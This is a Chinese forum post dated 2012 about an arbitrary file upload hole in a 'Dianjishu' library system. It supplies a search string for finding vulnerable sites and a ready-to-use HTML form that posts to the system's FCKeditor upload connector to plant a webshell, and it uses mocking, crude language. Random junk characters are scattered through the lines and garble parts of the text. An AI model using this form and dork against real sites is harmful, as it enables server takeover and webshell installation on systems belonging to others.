主题:图书馆系统任意文件上传漏洞
0 D' E. N4 u$ {. b# f" x 作者:冰锋刺客
# Z) p) n" r8 T! y2 z 厂商:点击书(dianjishu.com)
$ z- p% @$ k4 S/ o% r9 i4 k, V 日期:2012-6-21
0 Z$ l" h$ h" _8 t - W- A3 T2 N% l% t. b3 @( d
I 概述- s/ ]# |) C# ]2 G7 n5 V" u
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
+ w5 `/ \+ r% i. r II 简介$ j. w! l6 o/ l5 a# _
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
. Y1 w2 u/ U* X g5 T6 X 补充一个漏洞& F: E U+ ?$ q) o* V
<form id="frmUpload" enctype="multipart/form-data"
, D+ f4 d, I8 l( ^3 i. J/ g5 z action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
6 {5 j- v# m0 b7 P3 [% Y <input id="btnUpload" type="submit" value="操翻他">
. F1 D. d) B. e( I </form>. J0 N# n+ @, c) W7 D1 _
你们懂的
+ a2 U% U% e; g) U 那傻逼提供还需要改包.
$ B7 `. d4 a( _4 s2 I N0 m 自己看了下源代码发现fckeditor
) o$ P9 b/ b( x9 t% j% S& O 直接秒杀, _# y ~0 [! q1 O8 M
|
发表于 2012-9-10 21:20:59
收藏
支持
反对